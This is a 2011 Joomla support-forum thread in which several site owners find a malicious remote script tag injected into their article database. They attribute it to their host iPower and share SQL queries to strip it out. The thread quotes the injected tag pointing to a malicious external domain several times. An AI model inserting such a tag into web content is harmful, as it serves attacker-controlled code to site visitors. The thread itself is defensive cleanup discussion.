My Site Hacked

Discussion regarding Joomla! security issues.

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Locked
dhas
Joomla! Apprentice
Joomla! Apprentice
Posts: 42
Joined: Sat Dec 30, 2006 12:35 am

My Site Hacked

Post by dhas » Tue May 17, 2011 7:58 pm

Joomla 1.0.15 site

A script line of code has been added to every page of our site and I can't figure out how - I would have to guess some type of script was run on the mysql database? - the line added is <script src="http://infoitpoweringgathering.com/ll.p ... "></script>

does anyone know how this could have happened, through database or other means and:

How can I remove it from all pages quickly?

User avatar
seoirserob
Joomla! Apprentice
Joomla! Apprentice
Posts: 12
Joined: Wed May 18, 2011 11:16 am
Location: Ireland
Contact:

Looking for an answer also . . . any ideas?

Post by seoirserob » Wed May 18, 2011 1:47 pm

I've no idea where this came from . . . same script.
Any ideas?
If I delete it manually from each article will it reappear?

acedrummond
Joomla! Apprentice
Joomla! Apprentice
Posts: 25
Joined: Fri Jul 24, 2009 12:23 pm
Location: Parker CO

Re: My Site Hacked

Post by acedrummond » Wed May 18, 2011 4:26 pm

I have this problem today too!

Can someone tell me where you find this malicious code please! Thanks/

User avatar
seoirserob
Joomla! Apprentice
Joomla! Apprentice
Posts: 12
Joined: Wed May 18, 2011 11:16 am
Location: Ireland
Contact:

Joomla Version

Post by seoirserob » Wed May 18, 2011 5:18 pm

A google search for the offending script yielded this page, however, I ad not notice that in the original post you say you are using an old release of joomla! The current version is 1.5.23

Still though, I am using the current release. Yesterday I tried to set up Search Engine Friendly urls, but was having some trouble, in the process I renamed my htaccess.txt file, I think this may have allowed the script in. I have had trouble with a .htaccess file with this host once before, though not with a Joomla! installation.

I have since uploaded the original file from a backup and tried something simple. In phpMyadmin I exported the database and opened it in a text editor. I then ran a find and replace for the offending code, and removed all instances - the easy way is to hit "replace all" with the "replace with" field blank. I then saved this and imported the updated .msql file into a new database. Problem solved it seems for me, for now.

I am no expert, so I do not know if I have found the root of the problem. If you do attempt any of this, do backups first, so you might retrace your steps should it all go wrong.

acedrummond
Joomla! Apprentice
Joomla! Apprentice
Posts: 25
Joined: Fri Jul 24, 2009 12:23 pm
Location: Parker CO

Re: My Site Hacked

Post by acedrummond » Wed May 18, 2011 5:24 pm

I've found the line of code added to each page in the jos_content and am removing it manually!

acedrummond
Joomla! Apprentice
Joomla! Apprentice
Posts: 25
Joined: Fri Jul 24, 2009 12:23 pm
Location: Parker CO

Re: My Site Hacked

Post by acedrummond » Wed May 18, 2011 6:23 pm

I cleaned out the line of code with the problem from jos content/introtext in every page entry; however, I'm now looking for where to make the same change for the home page as it still hastwo instances of this code!!

Anyone know where I can find this?

acedrummond
Joomla! Apprentice
Joomla! Apprentice
Posts: 25
Joined: Fri Jul 24, 2009 12:23 pm
Location: Parker CO

Re: My Site Hacked

Post by acedrummond » Wed May 18, 2011 7:06 pm

OK solved it myself! - there were more lines in jos_content I missed the first time. Now it is cleaned out, but why and how is the next questions! How to prevent in future?

NyHick
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 240
Joined: Wed Jan 07, 2009 8:17 pm
Location: New York City

Re: My Site Hacked

Post by NyHick » Thu May 19, 2011 12:22 am

Question: are any of these sites perhaps hosted with IPOWER?
A clever person solves a problem. A wise person avoids it.

adamisaacebert
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Thu May 19, 2011 1:12 am

Re: My Site Hacked

Post by adamisaacebert » Thu May 19, 2011 1:14 am

I just found this on one of my client's sites...and they are hosted by iPower.

joebear21
Joomla! Fledgling
Joomla! Fledgling
Posts: 2
Joined: Thu May 19, 2011 1:29 am

Re: My Site Hacked

Post by joebear21 » Thu May 19, 2011 1:32 am

Our Joomla site also has this problem and is also hosted by iPower. The site isn't even online at the moment, it is still being designed so I took it offline. I'm going to try removing the script manually and hope for the best. It really hangs the load time which is how I noticed it.

NyHick
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 240
Joined: Wed Jan 07, 2009 8:17 pm
Location: New York City

Re: My Site Hacked

Post by NyHick » Thu May 19, 2011 1:32 am

That is what I figured.
IPOWER servers have been hacked.
The code is being placed into records in the database.
For Wordpress sites read this forum post:
http://wordpress.org/support/topic/i-di ... range-code
For Joomla! sites... well, I working on coming up with a solution that doesn't involve having to edit ever record.
A clever person solves a problem. A wise person avoids it.

acedrummond
Joomla! Apprentice
Joomla! Apprentice
Posts: 25
Joined: Fri Jul 24, 2009 12:23 pm
Location: Parker CO

Re: My Site Hacked

Post by acedrummond » Thu May 19, 2011 1:47 am

Mine was IPOWER also!

I spoke to them and have an open case that is escalated with them.

The fix is edit your Joomla database with phhpmyadmin jos content/introtext field in every page entry and remove the last line of code that starts with <script> and refers to the problem web site through the </script> and make sure you get them all and it is fixed!

joebear21
Joomla! Fledgling
Joomla! Fledgling
Posts: 2
Joined: Thu May 19, 2011 1:29 am

Re: My Site Hacked

Post by joebear21 » Thu May 19, 2011 1:59 am

I removed all the script lines. Anyone have an idea on how we can prevent this from happening again?

NyHick
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 240
Joined: Wed Jan 07, 2009 8:17 pm
Location: New York City

Re: My Site Hacked

Post by NyHick » Thu May 19, 2011 2:20 am

I agree that the fix can be done through phpmyadmin. But here are the issues:
* I have a client site which has over 500 articles.
* Unless IPOWER is able to discover the cause of the breach, fixes (or patches) the issue, and notifies every user on their servers of the breach, and every user fixes their sites, then there is a very real chance that the script may be placed into the site db records again.

I saw this happen with MediaTemple a couple of years ago and it was a big mess. So far IPOWER has not issued anything or even put up a System Notice in their Support Help Center.

I posted a notification in the message board about the issue along with everything I know so far.
http://forum.joomla.org/viewtopic.php?f=428&t=621812
A clever person solves a problem. A wise person avoids it.

acedrummond
Joomla! Apprentice
Joomla! Apprentice
Posts: 25
Joined: Fri Jul 24, 2009 12:23 pm
Location: Parker CO

Re: My Site Hacked

Post by acedrummond » Thu May 19, 2011 3:47 am

I received a message from IPOWERabout 1 hour ago that they 'removed the maliciouscode...' but no details.
Since I cleaned up myself I don't know what they did or are talking about so I asked them to explain and hopefully will get a reply to explain.
I suspect there was somethingelse planted that did this, but let's pursue IPOWER for answers I know I ceertainly will!

User avatar
seoirserob
Joomla! Apprentice
Joomla! Apprentice
Posts: 12
Joined: Wed May 18, 2011 11:16 am
Location: Ireland
Contact:

Re: My Site Hacked

Post by seoirserob » Thu May 19, 2011 7:40 am

My site is also hosted on iPower, this is not the first time I have had a site hacked on their servers, last time it involved the .htaccess as far as I remember, so I presumed this had played a part again. Am I wrong in thinking that this file can alter the content on each page if hacked?

Will also raise it with iPower today.

Slán go fóill.

dhas
Joomla! Apprentice
Joomla! Apprentice
Posts: 42
Joined: Sat Dec 30, 2006 12:35 am

Re: My Site Hacked

Post by dhas » Thu May 19, 2011 12:08 pm

It appears that the script was only added to to the introtext - I ran the following script in phpymyadmin to remove it from the entire site. Sorry I didn't post the day it happened. my site has very strong passwords since my site was hacked a few years ago and the .htaccess file replaced - so I suspect it is on the ipower side that they gained access.

UPDATE jos_content SET introtext = replace(introtext,'<script src="http://infoitpoweringgathering.com/ll.p ... "></script>','')

This page explains how to replace data in a mysql database - might be good to keep on hand for any future needs: http://www.mydigitallife.info/how-to-fi ... using-sql/

acedrummond
Joomla! Apprentice
Joomla! Apprentice
Posts: 25
Joined: Fri Jul 24, 2009 12:23 pm
Location: Parker CO

Re: My Site Hacked

Post by acedrummond » Fri May 20, 2011 12:51 am

To putthe whipped cream and the cherry on the cake IPOWER went into my database after I fixed the problem during the dayand managed to corrupt my jos_content table.

Repeated support calls got very polite, but ineffective responses.

I finally got osmeone to tell me wherethe backup was and was able to extract the content, repair the malicious insert into introtext and reload and my site back up after 24 hours of frustration with total ineptitude ofthe provider iPOWER - shame on them.

I will leave them unless they exlain how the database was harmed by tech support and how this whole episode started inthe first place.

I have many other Joomla sites with other providers and this does not happen there!

User avatar
seoirserob
Joomla! Apprentice
Joomla! Apprentice
Posts: 12
Joined: Wed May 18, 2011 11:16 am
Location: Ireland
Contact:

Re: My Site Hacked

Post by seoirserob » Fri May 20, 2011 7:24 am

Not entirely convinced by this host, security or service. When my ticket was submitted they asked for my affected domains (three in total), but also for the admin login details and passwords, which I did not provide, but today received the following reply . . . :

"Thank you for contacting Support.

The issue you have reported is now resolved and the hacked code has been removed from your database. Please insure your Joomla application and all plug ins are up to date and that you are using strong passwords that contain letters, numbers and special characters and are not based on dictionary words for your databases to help your blog be more resistant to these types of issues going forward. Please let us know if you need further assistance."

( am I to believe they went ahead and gained access where ever they felt like it, without my provision of passwords, to clean a database I had already cleaned? If so is this where the problem arises, can any human on their tech payroll access the database or admin of my site whenever they deem necessary? Or are they taking credit for the clean out I had already done, which does not inspire confidence? Sounds to my like not admitting they haven't a clue . . . )

acedrummond
Joomla! Apprentice
Joomla! Apprentice
Posts: 25
Joined: Fri Jul 24, 2009 12:23 pm
Location: Parker CO

Re: My Site Hacked

Post by acedrummond » Fri May 20, 2011 2:38 pm

My experience was that they got into my database and managed to corrupt the jos_content table AFTER I had already cleaned out the junk and told them I was already OK.

I suspect that all the MySql databases are managed as one or possibly groups and can be accessed from the top tier without our permission.

They offer no explanation nor information about what they are doing about this.

I'm preparing to leave them becasue I don't need this as other providers better service and none of these problems.

Every issue I've brought to them has been solved by me because they are unresponsive and unprofessional.

All I can say is they are polite and 'Have a good day!'

3 strikes and they are out!

savvaslim
Joomla! Fledgling
Joomla! Fledgling
Posts: 3
Joined: Thu Nov 19, 2009 12:11 pm

Re: My Site Hacked

Post by savvaslim » Mon Aug 08, 2011 10:34 am

Hi
I had the same issue and ipower. I used the command
update `jml_content` set `introtext`=TRIM(TRAILING '<script src="http://infoitpoweringgathering. com/ll.php?kk=11"></script>' FROM `introtext`);

to update them all at once and not miss anything.
does anyone think there is another field or table that was affected?

raghavmitra
Joomla! Apprentice
Joomla! Apprentice
Posts: 7
Joined: Sat Jan 28, 2012 8:55 am

Re: My Site Hacked

Post by raghavmitra » Mon Jan 30, 2012 7:04 am

seoirserob wrote:Not entirely convinced by this host, security or service. When my ticket was submitted they asked for my affected domains (three in total), but also for the admin login details and passwords, which I did not provide, but today received the following reply . . . :

"Thank you for contacting Support.

The issue you have reported is now resolved and the hacked code has been removed from your database. Please insure your Joomla application and all plug ins are up to date and that you are using strong passwords that contain letters, numbers and special characters and are not based on dictionary words for your databases to help your blog be more resistant to these types of issues going forward. Please let us know if you need further assistance."

( am I to believe they went ahead and gained access where ever they felt like it, without my provision of passwords, to clean a database I had already cleaned? If so is this where the problem arises, can any human on their tech payroll access the database or admin of my site whenever they deem necessary? Or are they taking credit for the clean out I had already done, which does not inspire confidence? Sounds to my like not admitting they haven't a clue . . . )
Support rep asking for login credentials is just a false show to make you believe that even then don't have access to your server which in fact is just a myth. Even i have a reseller's hosting account and do provide my customers with hosting accounts and i don't need their login details to access their servers.

So the moral of the story is that besides keeping your scripts update its necessary to choose a reliable host. If you have an important business website always opt for a dedicated hosting server. And last and not the least , avoid buying cheap hosting from forums and other places. My 2 cents.


Locked

Return to “Security - 1.0.x”